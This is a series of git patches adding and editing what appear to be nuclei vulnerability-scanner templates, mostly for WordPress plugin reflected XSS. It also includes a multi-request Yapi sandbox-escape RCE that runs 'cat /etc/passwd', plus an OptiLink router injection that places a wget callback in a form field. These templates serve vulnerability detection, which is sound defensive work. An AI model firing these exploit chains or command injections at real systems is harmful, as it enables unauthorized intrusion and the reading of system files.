+requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/checklist/images/checklist-icon.php?&fill=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E%3C%2Fpath%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 642f71278da4bcfdbe03c7a437ab2071921da1e2 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 15 Jul 2021 22:11:22 +0530 Subject: [PATCH 022/132] Added Yapi RCE --- vulnerabilities/other/yapi-rce.yaml | 110 ++++++++++++++++++++++++++++ 1 file changed, 110 insertions(+) create mode 100644 vulnerabilities/other/yapi-rce.yaml diff --git a/vulnerabilities/other/yapi-rce.yaml b/vulnerabilities/other/yapi-rce.yaml new file mode 100644 index 0000000000..e7ad5c1b20 --- /dev/null +++ b/vulnerabilities/other/yapi-rce.yaml @@ -0,0 +1,110 @@ +id: yapi-rce + +info: + name: Yapi Remote Code Execution + author: pikpikcu + severity: critical + tags: yapi,rce + reference: | + - https://www.secpulse.com/archives/162502.html + - https://gist.github.com/pikpikcu/0145fb71203c8a3ad5c67b8aab47165b + - https://twitter.com/sec715/status/1415484190561161216 + - https://github.com/YMFE/yapi + +requests: + - raw: + - | # REQUEST 1 + POST /api/user/reg HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + Content-Length: 94 + Content-Type: application/json;charset=UTF-8 + Accept-Encoding: gzip + + {"email":"{{randstr}}@example.com","password":"{{randstr}}","username":"{{randstr}}"} + + - | # REQUEST 2 + GET /api/group/list HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + Content-Type: application/json, text/plain, */* + Accept-Encoding: gzip + + - | # REQUEST 3 + POST /api/project/add HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + Content-Length: 106 + Content-Type: application/json;charset=UTF-8 + Accept-Encoding: gzip + + {"name":"{{randstr}}","basepath":"","group_id":"{{group_id}}","icon":"code-o","color":"cyan","project_type":"private"} + + - | # REQUEST 4 + GET /api/project/get?id={{project_id}} HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + Accept-Encoding: gzip + + - | # REQUEST 5 + POST /api/interface/add HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + Content-Length: 89 + Content-Type: application/json;charset=UTF-8 + Accept-Encoding: gzip + + {"method":"GET","catid":"{{project_id}}","title":"{{randstr_1}}","path":"/{{randstr_1}}","project_id":{{project_id}}} + + - | # REQUEST 6 + POST /api/plugin/advmock/save HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + Content-Length: 382 + Content-Type: application/json;charset=UTF-8 + Accept-Encoding: gzip + + {"project_id":"{{project_id}}","interface_id":"{{interface_id}}","mock_script":"const sandbox = this\r\nconst ObjectConstructor = this.constructor\r\nconst FunctionConstructor = ObjectConstructor.constructor\r\nconst myfun = FunctionConstructor('return process')\r\nconst process = myfun()\r\nmockJson = process.mainModule.require(\"child_process\").execSync(\"cat /etc/passwd\").toString()","enable":true} + + - | # REQUEST 7 + GET /mock/{{project_id}}/{{randstr_1}} HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + Accept-Encoding: gzip + + cookie-reuse: true + extractors: + - type: regex + name: group_id + group: 1 + internal: true + part: body + regex: + - '"_id":([0-9]+),"group_name"' + + - type: regex + name: interface_id + group: 1 + internal: true + part: body + regex: + - '"req_body_form":\[\],"_id":([0-9]+)' + + - type: regex + name: project_id + group: 1 + internal: true + part: body + regex: + - '"tag":\[\],"_id":([0-9]+)' + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0:" + part: body + + - type: status + status: + - 200 From 28278b45a259f0862d52dde84608509cc799ab0a Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 16 Jul 2021 00:06:33 +0700 Subject: [PATCH 023/132] Create CVE-2019-16332.yaml --- cves/2019/CVE-2019-16332.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2019/CVE-2019-16332.yaml diff --git a/cves/2019/CVE-2019-16332.yaml b/cves/2019/CVE-2019-16332.yaml new file mode 100644 index 0000000000..fa833c4377 --- /dev/null +++ b/cves/2019/CVE-2019-16332.yaml @@ -0,0 +1,29 @@ +id: CVE-2019-16332 + +info: + name: API Bearer Auth <= 20181229 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2019-16332 + tags: cve,cve2019,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?&server=%3Cscript%3Ealert%28123%29%3C/script%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From bf68e5060ddf745aaedc9c93f9198415f5ee8f8f Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 16 Jul 2021 00:09:33 +0700 Subject: [PATCH 024/132] Create CVE-2019-15713.yaml --- cves/2019/CVE-2019-15713.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2019/CVE-2019-15713.yaml diff --git a/cves/2019/CVE-2019-15713.yaml b/cves/2019/CVE-2019-15713.yaml new file mode 100644 index 0000000000..405bd13a64 --- /dev/null +++ b/cves/2019/CVE-2019-15713.yaml @@ -0,0 +1,29 @@ +id: CVE-2019-15713 + +info: + name: My Calendar <= 3.1.9 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2019-15713 + tags: cve,cve2019,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/?rsd=%27%3E%3Csvg%2Fonload%3Dconfirm%28123%29%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 367f5d225dc52b458233fef0b3d5c0aec5918a0f Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 16 Jul 2021 00:12:52 +0700 Subject: [PATCH 025/132] Create CVE-2018-20462.yaml --- cves/2018/CVE-2018-20462.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2018/CVE-2018-20462.yaml diff --git a/cves/2018/CVE-2018-20462.yaml b/cves/2018/CVE-2018-20462.yaml new file mode 100644 index 0000000000..e136ee5786 --- /dev/null +++ b/cves/2018/CVE-2018-20462.yaml @@ -0,0 +1,29 @@ +id: CVE-2018-20462 + +info: + name: JSmol2WP <= 1.07 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2018-20462 + tags: cve,cve2018,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 9d84281202c85d80bde71b2164cb05e503ba1a2c Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 16 Jul 2021 00:14:42 +0700 Subject: [PATCH 026/132] Create CVE-2018-11709.yaml --- cves/2018/CVE-2018-11709.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2018/CVE-2018-11709.yaml diff --git a/cves/2018/CVE-2018-11709.yaml b/cves/2018/CVE-2018-11709.yaml new file mode 100644 index 0000000000..e78227f474 --- /dev/null +++ b/cves/2018/CVE-2018-11709.yaml @@ -0,0 +1,29 @@ +id: CVE-2018-11709 + +info: + name: wpForo Forum <= 1.4.11 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2018-11709 + tags: cve,cve2018,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/index.php/community/?%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 5bee8dd7160ecf11ddc9303c54eb123be7679c5c Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 16 Jul 2021 00:16:27 +0700 Subject: [PATCH 027/132] Create CVE-2018-5316.yaml --- cves/2018/CVE-2018-5316.yaml | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 cves/2018/CVE-2018-5316.yaml diff --git a/cves/2018/CVE-2018-5316.yaml b/cves/2018/CVE-2018-5316.yaml new file mode 100644 index 0000000000..7553a25625 --- /dev/null +++ b/cves/2018/CVE-2018-5316.yaml @@ -0,0 +1,30 @@ +id: CVE-2018-5316 + +info: + name: SagePay Server Gateway for WooCommerce <= 1.0.8 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: The SagePay Server Gateway for WooCommerce plugin before 1.0.9 for WordPress has XSS via the includes/pages/redirect.php page parameter. + reference: https://nvd.nist.gov/vuln/detail/CVE-2018-5316 + tags: cve,cve2018,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 6bf13454aef603f4c4f28900e1e96edab43437a8 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 15 Jul 2021 23:15:22 +0530 Subject: [PATCH 028/132] Update optiLink-ont1gew-gpon-rce.yaml --- vulnerabilities/other/optiLink-ont1gew-gpon-rce.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/other/optiLink-ont1gew-gpon-rce.yaml b/vulnerabilities/other/optiLink-ont1gew-gpon-rce.yaml index 799426dc22..055c33da1e 100644 --- a/vulnerabilities/other/optiLink-ont1gew-gpon-rce.yaml +++ b/vulnerabilities/other/optiLink-ont1gew-gpon-rce.yaml @@ -1,4 +1,4 @@ -id: optiLink-ont1gew-gpon-rce +id: optilink-ont1gew-gpon-rce info: name: OptiLink ONT1GEW GPON - Pre-Auth Remote Code Execution @@ -25,7 +25,7 @@ requests: User: e8c Password: e8c User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 - + target_addr="1.1.1.1+`wget+http%3A%2F%2F{{interactsh-url}}%2F`"&waninf=127.0.0.1" matchers: From 9286c79bc1db4360fee193d3daa3e82e46c5a773 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Thu, 15 Jul 2021 23:15:45 +0530 Subject: [PATCH 029/132] Rename optiLink-ont1gew-gpon-rce.yaml to optilink-ont1gew-gpon-rce.yaml --- ...iLink-ont1gew-gpon-rce.yaml => optilink-ont1gew-gpon-rce.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename vulnerabilities/other/{optiLink-ont1gew-gpon-rce.yaml => optilink-ont1gew-gpon-rce.yaml} (100%) diff --git a/vulnerabilities/other/optiLink-ont1gew-gpon-rce.yaml b/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml similarity index 100% rename from vulnerabilities/other/optiLink-ont1gew-gpon-rce.yaml rename to vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml From 2c0400ddb2f847ba3cf006be9b495b15574e8a74 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 15 Jul 2021 23:41:09 +0530 Subject: [PATCH 030/132] Add files via upload --- technologies/seeddms-detect.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 technologies/seeddms-detect.yaml diff --git a/technologies/seeddms-detect.yaml b/technologies/seeddms-detect.yaml new file mode 100644 index 0000000000..25ca066589 --- /dev/null +++ b/technologies/seeddms-detect.yaml @@ -0,0 +1,19 @@ +id: seeddms-detect +info: + name: Seeddms- + author: pussycat0x + severity: info + tags: tech +requests: + - method: GET + path: + - "{{BaseURL}}/out/out.Login.php?referuri=%2Fout%2Fout.ViewFolder.php" + redirects: true + matchers-condition: and + matchers: + - type: word + words: + - "SeedDMS: Sign in" + - type: status + status: + - 200 \ No newline at end of file From 97dfd43f1e2462e558a0e53acbd8b9c784cd9c8d Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 15 Jul 2021 23:46:08 +0530 Subject: [PATCH 031/132] Added tag and removed unsafe --- cves/2020/CVE-2020-25506.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/cves/2020/CVE-2020-25506.yaml b/cves/2020/CVE-2020-25506.yaml index 21a5709c95..18de468cad 100644 --- a/cves/2020/CVE-2020-25506.yaml +++ b/cves/2020/CVE-2020-25506.yaml @@ -8,7 +8,7 @@ info: reference: | - https://gist.github.com/WinMin/6f63fd1ae95977e0e2d49bd4b5f00675 - https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/ - tags: cve,cve2020,dlink,rce + tags: cve,cve2020,dlink,rce,oob requests: - raw: @@ -28,7 +28,6 @@ requests: Accept: */* Connection: close - unsafe: true matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction From 94ae6ea0bfcbe28b23563b485efe9311a67d1b34 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 15 Jul 2021 23:47:05 +0530 Subject: [PATCH 032/132] Added tag --- cves/2020/CVE-2020-26919.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-26919.yaml b/cves/2020/CVE-2020-26919.yaml index fffb1e22e4..c658ea4e31 100644 --- a/cves/2020/CVE-2020-26919.yaml +++ b/cves/2020/CVE-2020-26919.yaml @@ -8,7 +8,7 @@ info: reference: | - https://research.nccgroup.com/2021/03/08/technical-advisory-multiple-vulnerabilities-in-netgear-prosafe-plus-jgs516pe-gs116ev2-switches/ - https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/ - tags: cve,cve2020,netgear,rce + tags: cve,cve2020,netgear,rce,oob requests: - raw: From 8e311dedcc53d95263e67f983331497a679783be Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 16 Jul 2021 00:12:15 +0530 Subject: [PATCH 033/132] Update seeddms-detect.yaml --- technologies/seeddms-detect.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/technologies/seeddms-detect.yaml b/technologies/seeddms-detect.yaml index 25ca066589..307611e1d0 100644 --- a/technologies/seeddms-detect.yaml +++ b/technologies/seeddms-detect.yaml @@ -8,7 +8,9 @@ requests: - method: GET path: - "{{BaseURL}}/out/out.Login.php?referuri=%2Fout%2Fout.ViewFolder.php" - redirects: true + + redirects: true + max-redirects: 2 matchers-condition: and matchers: - type: word From 81e94056c76ac14113fa61353b75193cf054b6c2 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Fri, 16 Jul 2021 08:34:17 +0700 Subject: [PATCH 034/132] Create yapi-detect.yaml --- technologies/yapi-detect.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 technologies/yapi-detect.yaml diff --git a/technologies/yapi-detect.yaml b/technologies/yapi-detect.yaml new file mode 100644 index 0000000000..fb38ed2157 --- /dev/null +++ b/technologies/yapi-detect.yaml @@ -0,0 +1,25 @@ +id: yapi-detect + +info: + name: YApi Detect + author: pikpikcu + severity: info + tags: tech,yapi + +requests: + - method: GET + path: + - "{{BaseURL}}/" + - "{{BaseURL}}:3000" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "YApi-高效、易用、功能强大的可视化接口管理平台" + + - type: status + status: + - 200 From 965bc15a89c73cc2a88629e98130895e448f8304 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Fri, 16 Jul 2021 08:48:26 +0700 Subject: [PATCH 035/132] Create node-red-detect.yaml --- technologies/node-red-detect.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 technologies/node-red-detect.yaml diff --git a/technologies/node-red-detect.yaml b/technologies/node-red-detect.yaml new file mode 100644 index 0000000000..9db6df3b6f --- /dev/null +++ b/technologies/node-red-detect.yaml @@ -0,0 +1,24 @@ +id: node-red-detect + +info: + name: Node RED Detect + author: pikpikcu + severity: info + tags: tech,node-red,apache + +requests: + - method: GET + path: + - "{{BaseURL}}/" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "Node-RED" + + - type: status + status: + - 200 From e89607941cbea26887b6cd288200508e16133dc8 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 16 Jul 2021 11:20:28 +0700 Subject: [PATCH 036/132] Create CVE-2017-18536.yaml --- cves/2017/CVE-2017-18536.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2017/CVE-2017-18536.yaml diff --git a/cves/2017/CVE-2017-18536.yaml b/cves/2017/CVE-2017-18536.yaml new file mode 100644 index 0000000000..ea6350dac0 --- /dev/null +++ b/cves/2017/CVE-2017-18536.yaml @@ -0,0 +1,29 @@ +id: CVE-2017-18536 + +info: + name: Stop User Enumeration 1.3.5-1.3.7 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://wpscan.com/vulnerability/956cc5fd-af06-43ac-aa85-46b468c73501 + tags: cve,cve2017,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/?author=1%3Cimg%20src%3Dx%20onerror%3Djavascript%3Aprompt%28123%29%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From d07faf803419f8a65ebddd453279afbc30494766 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 16 Jul 2021 11:22:53 +0700 Subject: [PATCH 037/132] Create CVE-2017-17451.yaml --- cves/2017/CVE-2017-17451.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2017/CVE-2017-17451.yaml diff --git a/cves/2017/CVE-2017-17451.yaml b/cves/2017/CVE-2017-17451.yaml new file mode 100644 index 0000000000..a42dbf3e4b --- /dev/null +++ b/cves/2017/CVE-2017-17451.yaml @@ -0,0 +1,29 @@ +id: CVE-2017-17451 + +info: + name: WP Mailster <= 1.5.4 - Unauthenticated Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17451 + tags: cve,cve2017,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php?mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 2a76b19a36179aafaa3fd8011a424b4a0808f020 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 16 Jul 2021 11:25:24 +0700 Subject: [PATCH 038/132] Create CVE-2017-17059.yaml --- cves/2017/CVE-2017-17059.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 cves/2017/CVE-2017-17059.yaml diff --git a/cves/2017/CVE-2017-17059.yaml b/cves/2017/CVE-2017-17059.yaml new file mode 100644 index 0000000000..7fccdaa7b6 --- /dev/null +++ b/cves/2017/CVE-2017-17059.yaml @@ -0,0 +1,31 @@ +id: CVE-2017-17059 + +info: + name: amtyThumb posts 8.1.3 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17059 + tags: cve,cve2017,wordpress,xss,wp-plugin + +requests: + - method: POST + path: + - "{{BaseURL}}/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E=1" + + body: "amty_hidden=1" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 5be858f2d633a5793d8dc86f3b1debaf300ebc63 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 16 Jul 2021 11:27:01 +0700 Subject: [PATCH 039/132] Create CVE-2017-17043.yaml --- cves/2017/CVE-2017-17043.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2017/CVE-2017-17043.yaml diff --git a/cves/2017/CVE-2017-17043.yaml b/cves/2017/CVE-2017-17043.yaml new file mode 100644 index 0000000000..7fd40c1e11 --- /dev/null +++ b/cves/2017/CVE-2017-17043.yaml @@ -0,0 +1,29 @@ +id: CVE-2017-17043 + +info: + name: Emag Marketplace Connector 1.0 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17043 + tags: cve,cve2017,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%22%2F%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 03698a57eea5d519df3b045bbd7cbb8e05dd83dc Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 16 Jul 2021 11:28:40 +0700 Subject: [PATCH 040/132] Create CVE-2017-9288.yaml --- cves/2017/CVE-2017-9288.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2017/CVE-2017-9288.yaml diff --git a/cves/2017/CVE-2017-9288.yaml b/cves/2017/CVE-2017-9288.yaml new file mode 100644 index 0000000000..1b442b3bf6 --- /dev/null +++ b/cves/2017/CVE-2017-9288.yaml @@ -0,0 +1,29 @@ +id: CVE-2017-9288 + +info: + name: Raygun4WP <= 1.8.0 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2017-9288 + tags: cve,cve2017,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/raygun4wp/sendtesterror.php?backurl=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 4dfcea3bea7c968c7d81d2f40291b0a2f4ff0302 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Jul 2021 10:28:02 +0530 Subject: [PATCH 041/132] Update node-red-detect.yaml --- technologies/node-red-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/technologies/node-red-detect.yaml b/technologies/node-red-detect.yaml index 9db6df3b6f..721bac1466 100644 --- a/technologies/node-red-detect.yaml +++ b/technologies/node-red-detect.yaml @@ -4,7 +4,7 @@ info: name: Node RED Detect author: pikpikcu severity: info - tags: tech,node-red,apache + tags: tech,apache requests: - method: GET From 6dfd64ecc9987848cc7ed411b35ddacb67e5a490 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 16 Jul 2021 04:59:58 +0000 Subject: [PATCH 042/132] Auto Update README [Fri Jul 16 04:59:58 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index b2ebc20708..835bd4293d 100644 --- a/README.md +++ b/README.md @@ -39,12 +39,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | | cves | 430 | vulnerabilities | 233 | exposed-panels | 200 | -| takeovers | 70 | exposures | 116 | technologies | 120 | +| takeovers | 70 | exposures | 116 | technologies | 121 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1551 files**. +**128 directories, 1552 files**. From 4287359c29e89a405d5a1ef4ced19b5b0d2edbc8 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Jul 2021 10:30:43 +0530 Subject: [PATCH 043/132] Update CVE-2017-9288.yaml --- cves/2017/CVE-2017-9288.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2017/CVE-2017-9288.yaml b/cves/2017/CVE-2017-9288.yaml index 1b442b3bf6..19bdc03839 100644 --- a/cves/2017/CVE-2017-9288.yaml +++ b/cves/2017/CVE-2017-9288.yaml @@ -4,6 +4,7 @@ info: name: Raygun4WP <= 1.8.0 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: The Raygun4WP plugin 1.8.0 for WordPress is vulnerable to a reflected XSS in sendtesterror.php (backurl parameter). reference: https://nvd.nist.gov/vuln/detail/CVE-2017-9288 tags: cve,cve2017,wordpress,xss,wp-plugin From bf583274fd7c429a0117b7b7617218e610697eff Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 16 Jul 2021 05:05:07 +0000 Subject: [PATCH 044/132] Auto Update README [Fri Jul 16 05:05:07 UTC 2021] :robot: --- README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index 835bd4293d..af2ddb7b77 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 430 | vulnerabilities | 233 | exposed-panels | 200 | -| takeovers | 70 | exposures | 116 | technologies | 121 | +| cves | 431 | vulnerabilities | 233 | exposed-panels | 200 | +| takeovers | 70 | exposures | 116 | technologies | 122 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1552 files**. +**128 directories, 1554 files**. From e859860aaa3e60bd2e6a5bc6173017efbeae6020 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 16 Jul 2021 05:08:39 +0000 Subject: [PATCH 045/132] Auto Update README [Fri Jul 16 05:08:39 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index af2ddb7b77..437101d33b 100644 --- a/README.md +++ b/README.md @@ -39,12 +39,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | | cves | 431 | vulnerabilities | 233 | exposed-panels | 200 | -| takeovers | 70 | exposures | 116 | technologies | 122 | +| takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1554 files**. +**128 directories, 1555 files**. From a7f24729222e69467d3b205505b96db8d074a87e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Jul 2021 10:41:33 +0530 Subject: [PATCH 046/132] Update CVE-2017-18536.yaml --- cves/2017/CVE-2017-18536.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2017/CVE-2017-18536.yaml b/cves/2017/CVE-2017-18536.yaml index ea6350dac0..5ac65f849b 100644 --- a/cves/2017/CVE-2017-18536.yaml +++ b/cves/2017/CVE-2017-18536.yaml @@ -4,6 +4,7 @@ info: name: Stop User Enumeration 1.3.5-1.3.7 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: The Stop User Enumeration WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability. reference: https://wpscan.com/vulnerability/956cc5fd-af06-43ac-aa85-46b468c73501 tags: cve,cve2017,wordpress,xss,wp-plugin From f0d1da0d2e15c512a505533438785ff7a2aa482e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Jul 2021 10:43:04 +0530 Subject: [PATCH 047/132] Update CVE-2017-17451.yaml --- cves/2017/CVE-2017-17451.yaml | 1 